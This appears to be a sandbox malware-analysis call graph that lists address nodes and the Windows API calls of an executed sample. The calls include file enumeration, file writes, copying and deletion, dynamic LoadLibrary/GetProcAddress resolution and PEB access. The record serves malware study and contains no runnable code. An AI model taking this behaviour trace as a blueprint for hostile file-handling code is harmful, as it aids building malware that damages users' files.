SysAllocStringLen 19507->19509 19508->19501 19509->19507 19509->19508 19511 403b76 SysFreeString 19510->19511 19512 403b7c 19510->19512 19511->19512 19514 4040b0 3 API calls 19513->19514 19515 4062ea 19514->19515 19516 4040b0 3 API calls 19515->19516 19517 406315 19516->19517 19517->18662 19519 4040f4 SysAllocStringLen 19518->19519 19520 4081bc 19519->19520 19521 40795c 26 API calls 19520->19521 19534 4081e2 19521->19534 19522 4082a3 19523 403b98 SysFreeString 19522->19523 19524 4082bd 19523->19524 19525 403508 7 API calls 19524->19525 19526 4082ca 19525->19526 19527 4047b4 9 API calls 19526->19527 19528 4082d8 19527->19528 19529 4034e4 7 API calls 19528->19529 19530 4082e0 19529->19530 19531 403b80 SysFreeString 19530->19531 19532 4082e8 19531->19532 19532->18666 19533 4039f0 21 API calls 19533->19534 19534->19522 19534->19533 19535 403e1c 3 API calls 19534->19535 19556 4072a0 19534->19556 19535->19534 19538 403dcf 19537->19538 19539 403e15 19538->19539 19540 403b58 2 API calls 19538->19540 19543 4076b0 19539->19543 19541 403dec 19540->19541 19542 403b70 SysFreeString 19541->19542 19542->19539 19544 4040f4 SysAllocStringLen 19543->19544 19545 4076c0 19544->19545 19546 4076d6 GetFileAttributesW 19545->19546 19547 4076f3 19546->19547 19548 403b80 SysFreeString 19547->19548 19549 4076fb 19548->19549 19549->18671 19549->18672 19551 4040bd 19550->19551 19555 4040c4 19550->19555 19552 403b58 2 API calls 19551->19552 19552->19555 19553 403b70 SysFreeString 19554 4040ed 19553->19554 19554->18679 19555->19553 19557 4040f4 SysAllocStringLen 19556->19557 19558 4072b5 19557->19558 19559 4072e2 CreateFileW 19558->19559 19560 4072fc 19559->19560 19561 4039e8 21 API calls 19560->19561 19562 407305 WriteFile CloseHandle 19561->19562 19563 407323 19562->19563 19564 4034e4 7 API calls 19563->19564 19565 40732b 19564->19565 19566 403b80 SysFreeString 19565->19566 19567 407333 19566->19567 19567->19534 19569 409210 19568->19569 19569->19569 19570 4093b3 19569->19570 19571 408120 21 API calls 19569->19571 19572 403b98 SysFreeString 19570->19572 19573 409249 19571->19573 19574 4093cd 19572->19574 19577 4062d8 3 API calls 19573->19577 19575 403508 7 API calls 19574->19575 19576 4093da 19575->19576 19578 403b98 SysFreeString 19576->19578 19579 409265 19577->19579 19580 4093e7 19578->19580 19958 408d44 19579->19958 19582 403508 7 API calls 19580->19582 19584 4093f4 19582->19584 19586 403b98 SysFreeString 19584->19586 19585 408120 21 API calls 19587 409289 19585->19587 19588 409401 19586->19588 19591 4062d8 3 API calls 19587->19591 19589 403508 7 API calls 19588->19589 19590 40940e 19589->19590 19592 403b98 SysFreeString 19590->19592 19593 4092a5 19591->19593 19594 40941b 19592->19594 19595 408d44 37 API calls 19593->19595 19596 403508 7 API calls 19594->19596 19597 4092b3 19595->19597 19598 409428 19596->19598 19599 408120 21 API calls 19597->19599 19600 403b98 SysFreeString 19598->19600 19601 4092c9 19599->19601 19602 409435 19600->19602 19605 4062d8 3 API calls 19601->19605 19603 403508 7 API calls 19602->19603 19604 409442 19603->19604 19606 403b98 SysFreeString 19604->19606 19607 4092e5 19605->19607 19608 40944f 19606->19608 19609 408d44 37 API calls 19607->19609 19610 403508 7 API calls 19608->19610 19611 4092f3 19609->19611 19612 40945c 19610->19612 19613 408120 21 API calls 19611->19613 19630 409ab0 19612->19630 19614 409309 19613->19614 19615 4062d8 3 API calls 19614->19615 19616 409325 19615->19616 19617 408d44 37 API calls 19616->19617 19618 409333 19617->19618 19619 408120 21 API calls 19618->19619 19620 409349 19619->19620 19621 4062d8 3 API calls 19620->19621 19622 409365 19621->19622 19623 408d44 37 API calls 19622->19623 19624 409373 19623->19624 19635 409ab8 19630->19635 19631 40a373 19632 403b98 SysFreeString 19631->19632 19633 40a390 19632->19633 19634 403b98 SysFreeString 19633->19634 19636 40a39d 19634->19636 19635->19631 19637 4062d8 3 API calls 19635->19637 19764 40b3ec 19636->19764 19638 409b04 19637->19638 20074 4098a0 19638->20074 19640 409b10 19641 4062d8 3 API calls 19640->19641 19642 409b39 19641->19642 19643 4098a0 44 API calls 19642->19643 19644 409b45 19643->19644 19645 4062d8 3 API calls 19644->19645 19646 409b6e 19645->19646 19647 4098a0 44 API calls 19646->19647 19648 409b7a 19647->19648 19765 40b405 19764->19765 20193 40b15c 19764->20193 19767 40aec4 19765->19767 19768 40357c 7 API calls 19767->19768 19769 40aefb 19768->19769 20230 40ae30 19769->20230 19771 40b073 19772 403508 7 API calls 19771->19772 19774 40af06 19774->19771 19775 4039f0 21 API calls 19774->19775 19776 403a30 21 API calls 19774->19776 19777 405210 26 API calls 19774->19777 19775->19774 19776->19774 19777->19774 19959 408d4d 19958->19959 19959->19959 19960 4040f4 SysAllocStringLen 19959->19960 19961 408d69 19960->19961 19962 4047a8 26 API calls 19961->19962 19963 408d9c 19962->19963 19964 403db8 3 API calls 19963->19964 19965 408dbd 19964->19965 19966 408dc8 FindFirstFileW 19965->19966 19974 408dd5 19966->19974 19967 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 19967->19974 19968 408e2a GetFileAttributesW 19969 4090e6 FindNextFileW 19968->19969 19968->19974 19971 409102 19969->19971 19969->19974 19970 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 19970->19974 19972 403508 7 API calls 19971->19972 19973 409191 19972->19973 19975 403b98 SysFreeString 19973->19975 19974->19967 19974->19968 19974->19969 19974->19970 19974->19971 19988 403798 21 API calls 19974->19988 19991 406984 21 API calls 19974->19991 19992 4039e8 21 API calls 19974->19992 19993 4036cc 21 API calls 19974->19993 19994 4034e4 7 API calls 19974->19994 19996 408a44 19974->19996 20026 405210 19974->20026 19977 4091a1 19975->19977 19978 4034e4 7 API calls 19977->19978 19979 4091a9 19978->19979 19980 4047b4 9 API calls 19979->19980 19981 4091b7 19980->19981 19982 403508 7 API calls 19981->19982 19983 4091c4 19982->19983 19984 4034e4 7 API calls 19983->19984 19985 4091cc 19984->19985 19986 403b80 SysFreeString 19985->19986 19987 4091d4 19986->19987 19989 4034e4 7 API calls 19987->19989 19988->19974 19990 4091dc 19989->19990 19990->19585 19991->19974 19992->19974 19993->19974 19994->19974 19997 408a4c 19996->19997 19997->19997 19998 4040f4 SysAllocStringLen 19997->19998 19999 408a62 19998->19999 20000 4047a8 26 API calls 19999->20000 20001 408a84 20000->20001 20048 407168 20001->20048 20003 408a92 20004 408120 21 API calls 20003->20004 20005 408aa8 20004->20005 20006 403850 21 API calls 20005->20006 20007 408abd 20006->20007 20008 407428 21 API calls 20007->20008 20009 408acd 20008->20009 20010 40357c 7 API calls 20009->20010 20017 408ad8 20010->20017 20011 403850 21 API calls 20011->20017 20012 408cbd 20013 403508 7 API calls 20012->20013 20014 408cd7 20013->20014 20015 403b80 SysFreeString 20014->20015 20016 408cdf 20015->20016 20016->19974 20017->20011 20017->20012 20018 4039f0 21 API calls 20017->20018 20019 407428 21 API calls 20017->20019 20020 408120 21 API calls 20017->20020 20021 403798 21 API calls 20017->20021 20023 4037dc 21 API calls 20017->20023 20024 4047a8 26 API calls 20017->20024 20025 403538 21 API calls 20017->20025 20063 403a30 20017->20063 20018->20017 20019->20017 20020->20017 20021->20017 20023->20017 20024->20017 20025->20017 20029 40522a 20026->20029 20027 4047a8 26 API calls 20028 4052fe 20027->20028 20030 403538 21 API calls 20028->20030 20029->20027 20037 40539f 20029->20037 20031 405319 20030->20031 20032 403538 21 API calls 20031->20032 20033 405331 20032->20033 20034 403538 21 API calls 20033->20034 20035 405349 20034->20035 20036 403538 21 API calls 20035->20036 20038 405361 20036->20038 20039 403508 7 API calls 20037->20039 20042 403538 21 API calls 20038->20042 20040 4053b9 20039->20040 20041 403508 7 API calls 20040->20041 20043 4053c6 20041->20043 20044 405379 20042->20044 20043->19974 20045 403538 21 API calls 20044->20045 20046 405391 20045->20046 20047 4050c8 21 API calls 20046->20047 20047->20037 20049 4040f4 SysAllocStringLen 20048->20049 20050 407182 20049->20050 20051 4034e4 7 API calls 20050->20051 20052 407198 20051->20052 20053 4034e4 7 API calls 20052->20053 20054 4071a0 20053->20054 20055 407200 20054->20055 20057 407275 20054->20057 20056 403ac0 21 API calls 20055->20056 20060 40721f 20056->20060 20058 4034e4 7 API calls 20057->20058 20059 40728a 20058->20059 20061 403b80 SysFreeString 20059->20061 20060->20003 20062 407292 20061->20062 20062->20003 20068 4039e0 20063->20068 20065 403a74 20065->20017 20066 403a3e 20066->20065 20067 403ac0 21 API calls 20066->20067 20067->20065 20069 40399c 20068->20069 20070 4039d7 20069->20070 20071 4035a8 21 API calls 20069->20071 20070->20066 20072 4039b3 20071->20072 20072->20070 20073 402550 7 API calls 20072->20073 20073->20070 20075 4098f4 20074->20075 20076 4040f4 SysAllocStringLen 20074->20076 20077 4040f4 SysAllocStringLen 20075->20077 20076->20075 20078 4098fc 20077->20078 20079 403b80 SysFreeString 20078->20079 20080 409917 20079->20080 20081 403db8 3 API calls 20080->20081 20082 40992b 20081->20082 20083 409936 FindFirstFileW 20082->20083 20085 409942 20083->20085 20084 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 20084->20085 20085->20084 20086 4076b0 3 API calls 20085->20086 20087 409a36 FindNextFileW 20085->20087 20093 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 20085->20093 20096 403e1c 3 API calls 20085->20096 20097 4095a4 20085->20097 20086->20085 20087->20085 20088 409a49 FindClose 20087->20088 20089 409a60 20088->20089 20090 403b98 SysFreeString 20089->20090 20091 409a70 20090->20091 20092 403b98 SysFreeString 20091->20092 20094 409a7d 20092->20094 20093->20085 20094->19640 20096->20087 20098 4095ad 20097->20098 20098->20098 20099 4040f4 SysAllocStringLen 20098->20099 20100 4095c9 20099->20100 20101 4040f4 SysAllocStringLen 20100->20101 20102 4095d1 20101->20102 20103 4040f4 SysAllocStringLen 20102->20103 20104 4095d9 20103->20104 20105 4034e4 7 API calls 20104->20105 20106 4095ef 20105->20106 20107 406fdc 4 API calls 20106->20107 20108 409600 20107->20108 20148 406f1c 20108->20148 20176 4027b4 QueryPerformanceCounter 20148->20176 20150 406f40 20177 4027c1 20176->20177 20178 4027cc GetTickCount 20176->20178 20177->20150 20178->20150 20194 40b164 20193->20194 20194->20194 20195 408120 21 API calls 20194->20195 20196 40b18a 20195->20196 20197 408120 21 API calls 20196->20197 20198 40b1a0 20197->20198 20199 40b1a8 LoadLibraryA GetProcAddress 20198->20199 20200 40b1c7 20199->20200 20201 408120 21 API calls 20200->20201 20202 40b1fb 20201->20202 20203 40b203 LoadLibraryA 20202->20203 20204 40b213 20203->20204 20205 40b36e 20203->20205 20206 408120 21 API calls 20204->20206 20207 403508 7 API calls 20205->20207 20208 40b220 20206->20208 20209 40b388 20207->20209 20211 40b228 GetProcAddress 20208->20211 20210 403b98 SysFreeString 20209->20210 20212 40b395 20210->20212 20213 408120 21 API calls 20211->20213 20214 403508 7 API calls 20212->20214 20215 40b23e 20213->20215 20216 40b3a2 20214->20216 20218 40b246 GetProcAddress 20215->20218 20217 403508 7 API calls 20216->20217 20220 40b3af 20217->20220 20219 408120 21 API calls 20218->20219 20221 40b25c 20219->20221 20222 404224 9 API calls 20220->20222 20224 40b264 GetProcAddress 20221->20224 20223 40b3c2 20222->20223 20223->19765 20228 40b27f 20224->20228 20228->20205 20231 40ae42 20230->20231 20232 4034e4 7 API calls 20231->20232 20233 40ae57 20232->20233 20240 40ad80 20233->20240 20236 40ae6a 20238 4034e4 7 API calls 20236->20238 20239 40ae7f 20238->20239 20239->19774 20241 40adad 20240->20241 20242 407500 9 API calls 20241->20242 20243 40adbf 20242->20243 20244 403b98 SysFreeString 20243->20244 20245 40ae03 20244->20245 20246 4034e4 7 API calls 20245->20246 20247 40ae0b 20246->20247 20247->20236 20248 40acb8 20247->20248 20249 40accf 20248->20249 20250 4034e4 7 API calls 20249->20250 20251 40ace4 20250->20251 20262 40a4dc OleInitialize 20251->20262 20263 4047a8 26 API calls 20262->20263 20638 40f94c 20637->20638 20639 4062d8 3 API calls 20638->20639 20640 40f997 20639->20640 20977 40f6ac 20640->20977 20642 40f9b0 20643 4062d8 3 API calls 20642->20643 20644 40f9d9 20643->20644 20645 40f6ac 35 API calls 20644->20645 20646 40f9f2 20645->20646 20647 4062d8 3 API calls 20646->20647 20648 40fa1b 20647->20648 20649 40f6ac 35 API calls 20648->20649 20650 40fa34 20649->20650 20651 4062d8 3 API calls 20650->20651 20652 40fa5d 20651->20652 20653 40f6ac 35 API calls 20652->20653 20654 40fa76 20653->20654 20655 4062d8 3 API calls 20654->20655 20656 40fa9f 20655->20656 20657 40f6ac 35 API calls 20656->20657 20658 40fab8 20657->20658 20659 4062d8 3 API calls 20658->20659 20660 40fae1 20659->20660 20661 40f6ac 35 API calls 20660->20661 20978 40f6b5 20977->20978 20978->20978 20979 4040f4 SysAllocStringLen 20978->20979 20980 40f6d4 20979->20980 20981 4040f4 SysAllocStringLen 20980->20981 20982 40f6dc 20981->20982 20983 4040f4 SysAllocStringLen 20982->20983 20984 40f6e4 20983->20984 20985 403db8 3 API calls 20984->20985 20986 40f712 20985->20986 20987 403d10 4 API calls 20986->20987 20988 403e1c 3 API calls 20986->20988 20990 403798 21 API calls 20986->20990 20991 40f783 20986->20991 21086 40f440 20986->21086 20987->20986 20988->20986 20990->20986 20992 403e1c 3 API calls 20991->20992 20996 40f7ab 20992->20996 20993 403d10 4 API calls 20993->20996 20994 403e1c 3 API calls 20994->20996 20995 40f440 27 API calls 20995->20996 20996->20993 20996->20994 20996->20995 20997 403798 21 API calls 20996->20997 20998 40f81c 20996->20998 20997->20996 20999 40f870 20998->20999 21000 403e1c 3 API calls 20998->21000 21001 403b80 SysFreeString 20999->21001 21002 40f851 21000->21002 21003 40f888 21001->21003 21111 40dce8 21002->21111 21004 4034e4 7 API calls 21003->21004 21005 40f893 21004->21005 21007 403b98 SysFreeString 21005->21007 21008 40f8a3 21007->21008 21009 4034e4 7 API calls 21008->21009 21010 40f8ae 21009->21010 21011 403b98 SysFreeString 21010->21011 21012 40f8be 21011->21012 21013 4034e4 7 API calls 21012->21013 21014 40f8c9 21013->21014 21015 403b80 SysFreeString 21014->21015 21016 40f8d4 21015->21016 21017 4034e4 7 API calls 21016->21017 21018 40f8dc 21017->21018 21019 403b98 SysFreeString 21018->21019 21020 40f8e9 21019->21020 21020->20642 21087 40f448 21086->21087 21087->21087 21088 4040f4 SysAllocStringLen 21087->21088 21089 40f460 21088->21089 21090 4034e4 7 API calls 21089->21090 21091 40f476 21090->21091 21092 407168 23 API calls 21091->21092 21093 40f481 21092->21093 21094 40795c 26 API calls 21093->21094 21107 40f491 21094->21107 21095 40f5fd 21096 403538 21 API calls 21095->21096 21097 40f608 21096->21097 21098 4047b4 9 API calls 21097->21098 21099 40f616 21098->21099 21100 403508 7 API calls 21099->21100 21101 40f630 21100->21101 21102 4047b4 9 API calls 21101->21102 21103 40f63e 21102->21103 21104 403b80 SysFreeString 21103->21104 21105 40f646 21104->21105 21105->20986 21106 4039f0 21 API calls 21106->21107 21107->21095 21107->21106 21108 40357c 7 API calls 21107->21108 21109 403850 21 API calls 21107->21109 21119 405148 21107->21119 21108->21107 21109->21107 21112 40dd01 21111->21112 21115 40dd48 21112->21115 21129 40dca8 21112->21129 21113 403508 7 API calls 21114 40dda2 21113->21114 21114->20999 21115->21113 21120 40515a 21119->21120 21121 4051ed 21120->21121 21124 4047a8 26 API calls 21120->21124 21122 4034e4 7 API calls 21121->21122 21123 405202 21122->21123 21123->21107 21125 4051c6 21124->21125 21126 403538 21 API calls 21125->21126 21127 4051e5 21126->21127 21128 4050c8 21 API calls 21127->21128 21128->21121 21130 4034e4 7 API calls 21129->21130 21132 40dcb6 21130->21132 21131 40dce2 21136 40d9ac 21131->21136 21132->21131 21133 403ac0 21 API calls 21132->21133 21134 40dccc 21133->21134 21135 40dcdc CharToOemBuffA 21134->21135 21135->21131 21137 40d9d0 21136->21137 21138 40357c 7 API calls 21137->21138 21139 40d9f1 21138->21139 21140 40357c 7 API calls 21139->21140 21141 40d9fc 21140->21141 21142 403ac0 21 API calls 21141->21142 21143 40da1b 21142->21143 21144 403ac0 21 API calls 21143->21144 21145 40da25 21144->21145 21146 4039e8 21 API calls 21145->21146 21147 40da2d 21146->21147 21148 4035d4 21 API calls 21147->21148 21149 40daed 21148->21149 21150 403850 21 API calls 21149->21150 21151 40db06 21150->21151 21152 4034e4 7 API calls 21151->21152 21153 40db0e 21152->21153 21154 4035d4 21 API calls 21153->21154 21155 40db1e 21154->21155 21156 403850 21 API calls 21155->21156 21157 40db34 21156->21157 21158 4034e4 7 API calls 21157->21158 21159 40db3c 21158->21159 21160 403508 7 API calls 21159->21160 21161 40db59 21160->21161 21161->21115 21559 4132e8 21557->21559 21558 413faa 21560 403b98 SysFreeString 21558->21560 21559->21558 21563 4062d8 3 API calls 21559->21563 21561 413fc7 21560->21561 21562 403b98 SysFreeString 21561->21562 21564 413fd7 21562->21564 21565 413343 21563->21565 21566 4034e4 7 API calls 21564->21566 21713 412d9c 21565->21713 21567 413fdf 21566->21567 21567->18290 21569 41335c 21570 4062d8 3 API calls 21569->21570 21571 413387 21570->21571 21572 412d9c 44 API calls 21571->21572 21573 4133a0 21572->21573 21574 4062d8 3 API calls 21573->21574 21575 4133cb 21574->21575 21576 412d9c 44 API calls 21575->21576 21577 4133e4 21576->21577 21578 4062d8 3 API calls 21577->21578 21579 41340f 21578->21579 21580 412d9c 44 API calls 21579->21580 21581 413428 21580->21581 21582 4062d8 3 API calls 21581->21582 21583 413453 21582->21583 21584 412d9c 44 API calls 21583->21584 21585 41346c 21584->21585 21586 4062d8 3 API calls 21585->21586 21587 413497 21586->21587 21588 412d9c 44 API calls 21587->21588 21589 4134b0 21588->21589 21590 4062d8 3 API calls 21589->21590 21591 4134db 21590->21591 21592 412d9c 44 API calls 21591->21592 21593 4134f4 21592->21593 21594 4062d8 3 API calls 21593->21594 21714 412da5 21713->21714 21714->21714 21715 4040f4 SysAllocStringLen 21714->21715 21716 412dc4 21715->21716 21717 4040f4 SysAllocStringLen 21716->21717 21718 412dcc 21717->21718 21719 4040f4 SysAllocStringLen 21718->21719 21720 412dd4 21719->21720 21721 403db8 3 API calls 21720->21721 21722 412dfc 21721->21722 21723 412e07 FindFirstFileW 21722->21723 21742 412e10 21723->21742 21724 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 21724->21742 21725 4076b0 3 API calls 21725->21742 21726 412f5e FindNextFileW 21727 412f76 FindClose 21726->21727 21726->21742 21728 412f8c 21727->21728 21729 403b98 SysFreeString 21728->21729 21731 412f9c 21729->21731 21730 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 21730->21742 21732 4034e4 7 API calls 21731->21732 21734 412fa7 21732->21734 21735 403b98 SysFreeString 21734->21735 21736 412fb7 21735->21736 21737 4034e4 7 API calls 21736->21737 21738 412fc2 21737->21738 21739 403b98 SysFreeString 21738->21739 21740 412fd2 21739->21740 21741 403b98 SysFreeString 21740->21741 21743 412fdf 21741->21743 21742->21724 21742->21725 21742->21726 21742->21730 21744 40dce8 22 API calls 21742->21744 21777 4129a4 21742->21777 21743->21569 21744->21742 21778 4129ac 21777->21778 21778->21778 21779 4040f4 SysAllocStringLen 21778->21779 21780 4129c4 21779->21780 21781 403b80 SysFreeString 21780->21781 21782 4129da GetTickCount 21781->21782 21783 406fdc 4 API calls 21782->21783 21784 4129f5 21783->21784 21785 406f1c 10 API calls 21784->21785 21786 412a00 21785->21786 21787 403e1c 3 API calls 21786->21787 21788 412a15 21787->21788 21789 40781c 8 API calls 21788->21789 21790 412a20 21789->21790 21791 4062d8 3 API calls 21790->21791 21792 412a2d 21791->21792 21793 403e1c 3 API calls 21792->21793 21794 412a45 21793->21794 21795 40781c 8 API calls 21794->21795 21796 412a50 21795->21796 21797 412a63 CopyFileW 21796->21797 21798 412a74 21797->21798 21799 404afc 22 API calls 21798->21799 21800 412a7f 21799->21800 21801 4076b0 3 API calls 21800->21801 21824 412a92 21801->21824 21802 412a96 21803 403b98 SysFreeString 21802->21803 21804 412c24 21803->21804 21805 4034e4 7 API calls 21804->21805 21806 412c2c 21805->21806 21807 403b98 SysFreeString 21806->21807 21808 412c39 21807->21808 21809 403508 7 API calls 21808->21809 21810 412c46 21809->21810 21812 403b98 SysFreeString 21810->21812 21811 412bc1 21813 403bbc 3 API calls 21811->21813 21814 412c53 21812->21814 21815 412bfc 21813->21815 21817 4034e4 7 API calls 21814->21817 21819 412c04 DeleteFileW 21815->21819 21816 4034e4 7 API calls 21816->21824 21818 412c5b 21817->21818 21820 403b98 SysFreeString 21818->21820 21819->21802 21821 412c68 21820->21821 21824->21802 21824->21811 21824->21816 21825 403e1c 3 API calls 21824->21825 21825->21824 21876 415618 21875->21876 21876->21876 21877 4040f4 SysAllocStringLen 21876->21877 21878 41562d 21877->21878 21879 4062d8 3 API calls 21878->21879 21880 41564e 21879->21880 21881 4047a8 26 API calls 21880->21881 21882 415663 21881->21882 21883 403bbc 3 API calls 21882->21883 21884 415684 21883->21884 21885 403bbc 3 API calls 21884->21885 21886 4156a5 21885->21886 21887 403bbc 3 API calls 21886->21887 21888 4156c6 21887->21888 21889 403bbc 3 API calls 21888->21889 21890 4156e7 21889->21890 21891 403bbc 3 API calls 21890->21891 21892 415708 21891->21892 21893 403bbc 3 API calls 21892->21893 21894 415729 21893->21894 21895 403db8 3 API calls 21894->21895 21896 41573d 21895->21896 21897 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 21896->21897 21898 4076b0 3 API calls 21896->21898 21899 41587b 21896->21899 21907 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 21896->21907 22030 40ddb0 21896->22030 21897->21896 21898->21896 21900 407500 9 API calls 21899->21900 21901 4158c6 21900->21901 21902 415a02 21901->21902 21903 4076b0 3 API calls 21901->21903 21904 4047a8 26 API calls 21902->21904 21905 4158df 21903->21905 21906 415a1e 21904->21906 21905->21902 22055 40770c 21905->22055 21911 403bbc 3 API calls 21906->21911 21907->21896 21913 415a3f 21911->21913 21912 403e1c 3 API calls 21914 415913 21912->21914 21915 403bbc 3 API calls 21913->21915 21916 40ddb0 30 API calls 21914->21916 21917 415a60 21915->21917 21918 415932 21916->21918 21921 403bbc 3 API calls 21917->21921 21919 40770c 6 API calls 21918->21919 21920 415948 21919->21920 21922 403e1c 3 API calls 21920->21922 21923 415a81 21921->21923 21924 415963 21922->21924 21925 403bbc 3 API calls 21923->21925 21926 403db8 3 API calls 21924->21926 21927 415aa2 21925->21927 21928 41598e 21926->21928 21931 403bbc 3 API calls 21927->21931 21929 40ddb0 30 API calls 21928->21929 21930 41599a 21929->21930 21932 40770c 6 API calls 21930->21932 21971 415ac3 21931->21971 21933 4159b0 21932->21933 21934 403e1c 3 API calls 21933->21934 21935 4159cb 21934->21935 21941 403db8 3 API calls 21935->21941 21936 415cad 21937 403b80 SysFreeString 21936->21937 21938 415cc5 21937->21938 21940 4034e4 7 API calls 21938->21940 21939 403db8 3 API calls 21939->21971 21942 415cd0 21940->21942 21943 4159f6 21941->21943 21945 403b98 SysFreeString 21942->21945 21946 40ddb0 30 API calls 21943->21946 21944 407500 9 API calls 21944->21971 21947 415ce0 21945->21947 21946->21902 21948 4034e4 7 API calls 21947->21948 21949 415ceb 21948->21949 21950 403b98 SysFreeString 21949->21950 21951 415cfb 21950->21951 21952 4034e4 7 API calls 21951->21952 21954 415d06 21952->21954 21953 4076b0 SysFreeString SysAllocStringLen GetFileAttributesW 21953->21971 21955 403b98 SysFreeString 21954->21955 21956 415d16 21955->21956 21957 4034e4 7 API calls 21956->21957 21958 415d21 21957->21958 21965 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 21965->21971 21971->21936 21971->21939 21971->21944 21971->21953 21971->21965 21973 40ddb0 30 API calls 21971->21973 21973->21971 22031 4040f4 SysAllocStringLen 22030->22031 22032 40ddc9 22031->22032 22033 40de7f 22032->22033 22034 407168 23 API calls 22032->22034 22035 403b98 SysFreeString 22033->22035 22038 40de0b 22034->22038 22036 40de99 22035->22036 22037 403508 7 API calls 22036->22037 22040 40dea6 22037->22040 22039 40de59 22038->22039 22041 4062d8 3 API calls 22038->22041 22043 40dce8 22 API calls 22039->22043 22042 403b80 SysFreeString 22040->22042 22048 40de26 22041->22048 22044 40deae 22042->22044 22045 40de64 22043->22045 22044->21896 22046 4062d8 3 API calls 22045->22046 22047 40de71 22046->22047 22049 40de79 DeleteFileW 22047->22049 22050 40de37 CopyFileW 22048->22050 22049->22033 22050->22039 22051 40de41 22050->22051 22052 4062d8 3 API calls 22051->22052 22053 40de4e 22052->22053 22054 407168 23 API calls 22053->22054 22054->22039 22056 4040f4 SysAllocStringLen 22055->22056 22057 40771f 22056->22057 22058 403b80 SysFreeString 22057->22058 22059 407734 22058->22059 22062 403ee8 4 API calls 22059->22062 22063 40776d 22059->22063 22060 403b80 SysFreeString 22061 407789 22060->22061 22061->21912 22062->22063 22063->22060 22065 405050 22064->22065 22066 403538 21 API calls 22065->22066 22071 405068 22066->22071 22067 4050a5 22068 4034e4 7 API calls 22067->22068 22069 4050ba 22068->22069 22069->18803 22070 4039e8 21 API calls 22070->22071 22071->22067 22071->22070 22073 4141c0 22072->22073 22073->22073 22074 4040f4 SysAllocStringLen 22073->22074 22075 4141d6 22074->22075 22076 403b80 SysFreeString 22075->22076 22077 4141eb 22076->22077 22078 407168 23 API calls 22077->22078 22079 4141f6 22078->22079 22081 403a30 21 API calls 22079->22081 22107 4142af 22079->22107 22080 403b98 SysFreeString 22082 41436d 22080->22082 22086 414227 22081->22086 22083 403508 7 API calls 22082->22083 22084 41437a 22083->22084 22085 403b98 SysFreeString 22084->22085 22087 414387 22085->22087 22088 403a30 21 API calls 22086->22088 22086->22107 22089 403508 7 API calls 22087->22089 22093 41424f 22088->22093 22090 414394 22089->22090 22091 403b80 SysFreeString 22090->22091 22092 41439c 22091->22092 22092->18882 22094 4036cc 21 API calls 22093->22094 22093->22107 22095 414271 22094->22095 22096 407428 21 API calls 22095->22096 22097 414281 22096->22097 22116 4140f8 22097->22116 22099 4142ab 22100 407428 21 API calls 22099->22100 22099->22107 22102 4142d4 22100->22102 22101 414294 22101->22099 22123 414150 22101->22123 22104 403850 21 API calls 22102->22104 22105 4142f2 22104->22105 22106 407428 21 API calls 22105->22106 22108 414302 22106->22108 22107->22080 22109 40357c 7 API calls 22108->22109 22110 41430d 22109->22110 22111 4037dc 21 API calls 22110->22111 22112 41431b 22111->22112 22117 4040f4 SysAllocStringLen 22116->22117 22118 414108 22117->22118 22119 41411e GetFileAttributesW 22118->22119 22120 414137 22119->22120 22121 403b80 SysFreeString 22120->22121 22122 41413f 22121->22122 22122->22101 22124 4040f4 SysAllocStringLen 22123->22124 22125 414160 22124->22125 22126 414176 GetFileAttributesW 22125->22126 22127 4140f8 3 API calls 22126->22127 22128 41418d 22127->22128 22129 403b80 SysFreeString 22128->22129 22130 4141a8 22129->22130 22130->22099 22132 4040f4 SysAllocStringLen 22131->22132 22133 4070d4 22132->22133 22134 4040f4 SysAllocStringLen 22133->22134 22135 4070dc 22134->22135 22136 4040f4 SysAllocStringLen 22135->22136 22137 4070e4 22136->22137 22138 407131 22137->22138 22143 403f34 3 API calls 22137->22143 22145 403fc4 22137->22145 22139 403bbc 3 API calls 22138->22139 22140 40713c 22139->22140 22141 403b98 SysFreeString 22140->22141 22142 407156 22141->22142 22142->18918 22143->22137 22147 403fdc 22145->22147 22146 404057 22146->22137 22147->22146 22148 403b58 2 API calls 22147->22148 22149 404007 22148->22149 22150 403b70 SysFreeString 22149->22150 22150->22146 22152 41781a 22151->22152 22153 4047a8 26 API calls 22152->22153 22156 417837 22152->22156 22153->22156 22154 4047b4 9 API calls 22155 4178a2 GetHGlobalFromStream GlobalFix 22154->22155 22155->18953 22156->22154 22157->18971 22158->18976 22160 416faf 22159->22160 22160->19010 22162 403538 21 API calls 22161->22162 22163 407a75 22162->22163 22164 407a93 22163->22164 22165 407a84 22163->22165 22167 40357c 7 API calls 22164->22167 22166 40357c 7 API calls 22165->22166 22168 407a91 22166->22168 22167->22168 22362 407a34 GetPEB 22168->22362 22170 407aa5 22171 406fdc 4 API calls 22170->22171 22172 407acd 22171->22172 22173 406fdc 4 API calls 22172->22173 22174 407adf 22173->22174 22175 403e1c 3 API calls 22174->22175 22177 407aef 22175->22177 22176 407b0b 22179 403b98 SysFreeString 22176->22179 22177->22176 22178 403798 21 API calls 22177->22178 22178->22176 22180 407b25 22179->22180 22181 4034e4 7 API calls 22180->22181 22182 407b2d 22181->22182 22182->19015 22184 403bbc 3 API calls 22183->22184 22185 4066cf 22184->22185 22363 406654 GetModuleHandleA GetProcAddress 22185->22363 22188 4066e4 22188->19019 22189 403bbc 3 API calls 22189->22188 22362->22170 22364 406676 GetCurrentProcess 22363->22364 22365 40667f 22363->22365 22364->22365 22365->22188 22365->22189 22400 404215 22399->22400 22401 40421c 22399->22401 22400->19115 22402 402614 7 API calls 22401->22402 22403 404223 22402->22403 22403->19115 22405 4041ea 22404->22405 22406 404224 9 API calls 22405->22406 22407 404203 22405->22407 22406->22405 22407->19123 22409 403372 GetStdHandle WriteFile GetStdHandle WriteFile 22408->22409 22410 4033c9 22408->22410 22409->18391 22411 4033d2 MessageBoxA 22410->22411 22412 4033e5 22410->22412 22411->22412 22412->18391 22414 417b1a 22415 417b29 20 API calls 22414->22415 22416 417c2d 22414->22416 22415->22416 22417 40955e 22418 409583 22417->22418 22419 409569 LoadLibraryA GetProcAddress 22417->22419 22419->22418

                                                                                                    Executed Functions

